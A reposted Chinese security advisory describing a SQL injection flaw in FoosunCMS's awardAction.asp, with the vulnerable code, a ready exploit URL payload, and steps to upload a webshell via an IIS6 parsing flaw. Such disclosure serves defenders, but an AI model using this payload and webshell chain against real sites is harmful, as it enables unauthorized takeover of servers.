关注网络与数据安全

忘记密码
“游侠安全网”创建了网络安全从业者QQ大群(群号:1040978125) ,欢迎各位同仁加入!有其它问题,请联系站长“网路游侠”,QQ:55984512


风讯网站管理系统awardAction.asp页面存在SQL注入

2010-06-28 23:08 推荐: 浏览: 56字号:

摘要: 发布日期:2010-06.26 信息来源:WAVDB 影响版本:FooSun > 5.0 程序介绍:FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。漏洞分析: 在文件\User\award\award...

发布日期:2010-06.26
信息来源:WAVDB
影响版本:FooSun > 5.0
程序介绍:FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
漏洞分析:
在文件\User\award\awardAction.asp中:
Integral=NoSqlHack(request.QueryString("Integral")) //第14行
if action="join" then
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
'获得当前参加人数--------------------------------
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")
数字变量Integral使用过滤字符的函数过滤导致sql注入漏洞的产生,导致可以修改表FS_ME_User的任意内容,配合系统的其他功能可以拿到webshell
漏洞利用:
注册用户登陆后,访问Url:
/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1
退出后再登陆,在文件管理处上传后缀为doc的webshell就可以拿到webshell。(利用IIS6对文件夹为*.asp的解析漏洞)
解决方案:
厂商补丁:
FooSun
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
本文来自: 红科网安官方网络安全论坛

联系站长租广告位!

中国首席信息安全官